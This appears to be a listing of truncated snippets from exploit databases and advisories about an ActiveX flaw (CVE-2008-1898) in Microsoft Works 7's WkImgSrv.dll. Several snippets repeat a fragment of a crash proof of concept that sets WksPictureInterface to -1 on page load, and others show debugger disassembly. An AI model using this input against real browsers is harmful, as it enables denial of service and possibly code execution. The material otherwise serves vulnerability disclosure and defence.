Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit

No description provided by source. !– The problem is in wkimgsrv.dll module shipped with many MS Offiice Suite tested on MS OF 2003,MS OF 2007 Actually,this is not the case of buffer overflow attack,just a exploit of insecure method WKsPictureInterface...

Microsoft Works 7 WkImgSrv.dll vulnerability-vulnerability warning-the black bar safety net

Many machines pre-loaded with works7, Works 7 WkImgSrv.dll controls overflow html head titleMicrosoft Works 7 WkImgSrv.dll crash POC/title script language="JavaScript" function payload var num = -1; obj. WksPictureInterface = num; /script /head body object...

Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit

Exploit for unknown platform in category remote exploits ========================================================= Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit ========================================================= MOV ESI,DWORD PTR SS:EBP+8 ; Do some other stuffs, we don't care...

Microsoft Works 7 - WkImgSrv.dll ActiveX Remote Buffer Overflow

Microsoft Works 7 - WkImgSrv.dll ActiveX Remote Buffer Overflow MOV ESI,DWORD PTR SS:EBP+8 ; Do some other stuffs, we don't care 00D473D8 LEA EDX,DWORD PTR SS:EBP-1C ; 00D473DB PUSH EDX 00D473DC PUSH EAX 00D473DD MOV DWORD PTR DS:ESI+2A0,EAX ; ============= 00D473E3 == MOV ECX,DWORD PTR DS:EAX ;...

Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Remote Buffer Overflow

MOV ESI,DWORD PTR SS:EBP+8 ; Do some other stuffs, we don't care 00D473D8 LEA EDX,DWORD PTR SS:EBP-1C ; 00D473DB PUSH EDX 00D473DC PUSH EAX 00D473DD MOV DWORD PTR DS:ESI+2A0,EAX ; ============= 00D473E3 == MOV ECX,DWORD PTR DS:EAX ; Here is the problem,the data stored by EAX is referenced and mov...

DSquare Exploit Pack: D2SEC_WORKS7

Name| d2secworks7 ---|--- CVE| CVE-2008-1898 Exploit Pack| D2ExploitPack Description| Microsoft Works 7 WkImgSrv.dll ActiveX Remote Code Execution Vulnerability Notes|...

Microsoft Works 7 WkImgSrv.dll crash POC

No description provided by source. html head titleMicrosoft Works 7 WkImgSrv.dll crash POC/title script language="JavaScript" function payload var num = -1; obj.WksPictureInterface = num; /script /head body onload="JavaScript: return payload;"...

Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC

No description provided by source. html head titleMicrosoft Works 7 WkImgSrv.dll crash POC/title script language="JavaScript" function payload var num = -1; obj.WksPictureInterface = num; /script /head body onload="JavaScript: return payload;"...

Microsoft Works 7 'WkImgSrv.dll' ActiveX Control Remote Code Execution Vulnerability

Description Microsoft Works 7 'WkImgSrv.dll' ActiveX control is prone to a remote code-execution vulnerability because it fails to sufficiently verify user-supplied input. An attacker can exploit this issue to run arbitrary attacker-supplied code in the context of the currently logged-in user...

Microsoft Works 7 - WkImgSrv.dll ActiveX Denial of Service (PoC)

Microsoft Works 7 - WkImgSrv.dll ActiveX Denial of Service PoC Microsoft Works 7 WkImgSrv.dll crash POC function payload var num = -1; obj.WksPictureInterface = num; milw0rm.com 2008-04-17...

Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Denial of Service (PoC)

Microsoft Works 7 WkImgSrv.dll crash POC function payload var num = -1; obj.WksPictureInterface = num; milw0rm.com 2008-04-17...

msworks-dos.txt

DLL VERSION 7.03.0616.0 TEST ON IE7+XPSP2CN MYBLOG:http://hi.baidu.com/nansec/ 0DAY? I don't know. POC: Microsoft Works 7 WkImgSrv.dll crash POC function payload var num = -1; obj.WksPictureInterface = num;...

Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC

Exploit for unknown platform in category dos / poc ============================================================ Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC ============================================================ Microsoft Works 7 WkImgSrv.dll crash POC function payload var n...